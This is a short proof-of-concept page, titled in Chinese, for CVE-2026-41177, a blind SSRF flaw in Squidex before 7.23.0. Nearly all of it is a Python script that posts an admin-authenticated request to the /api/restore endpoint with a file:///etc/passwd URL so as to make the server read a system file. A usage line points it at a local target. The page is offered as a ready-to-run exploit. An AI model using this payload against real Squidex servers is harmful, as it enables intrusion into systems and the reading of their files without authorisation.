CVE-2026-41177 Squidex盲SSRF漏洞

# PoC for CVE-2026-41177 (Blind SSRF in Squidex) # Target: Squidex < 7.23.0 # Requirements: Administrator privileges import requests def exploit_squidex_ssrf(target_url, admin_token): """ Exploit the Blind SSRF via Restore API using file:// scheme. """ headers = { "Authorization": f"Bearer {admin_token}", "Content-Type": "application/json" } # The endpoint vulnerable to SSRF api_endpoint = f"{target_url}/api/restore" # Malicious payload attempting to read /etc/passwd payload = { "Url": "file:///etc/passwd" } try: response = requests.post(api_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check server logs for file interaction traces.") else: print(f"[-] Request failed with status code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"[!] Error occurred: {e}") # Usage Example # exploit_squidex_ssrf("http://localhost:5000", "YOUR_ADMIN_TOKEN")